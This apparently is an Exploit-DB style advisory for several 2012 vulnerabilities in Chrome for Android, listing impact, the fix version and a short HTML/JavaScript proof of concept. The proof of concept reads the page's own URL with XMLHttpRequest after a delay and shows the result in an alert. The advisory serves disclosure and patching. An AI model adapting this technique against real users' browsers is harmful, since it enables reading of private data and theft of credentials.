Google Chrome for Android Multiple Vulnerabilities

vendor:

Chrome for Android

by:

SecurityFocus

7,5

CVSS

HIGH

Multiple Vulnerabilities

N/A

CWE

Product Name: Chrome for Android

Affected Version From: Prior to Chrome for Android 18.0.1025308

Affected Version To: N/A

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Android

2012

Google Chrome for Android Multiple Vulnerabilities

Attackers may exploit these issues to execute arbitrary code in the context of the browser, obtain potentially sensitive information, bypass the same-origin policy, and steal cookie-based authentication credentials; other attacks are also possible.

Mitigation:

Upgrade to Chrome for Android 18.0.1025308 or later.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/55523/info
   
Google Chrome for Android is prone to multiple vulnerabilities.
   
Attackers may exploit these issues to execute arbitrary code in the context of the browser, obtain potentially sensitive information, bypass the same-origin policy, and steal cookie-based authentication credentials; other attacks are also possible.
   
Versions prior to Chrome for Android 18.0.1025308 are vulnerable. 

<body>
     <u>Wait a few seconds.</u>
     <script>
     function doitjs() {
       var xhr = new XMLHttpRequest;
       xhr.onload = function() {
         alert(xhr.responseText);
       };
       xhr.open('GET', document.URL);
       xhr.send(null);
     }
     setTimeout(doitjs, 8000);
     </script>
</body>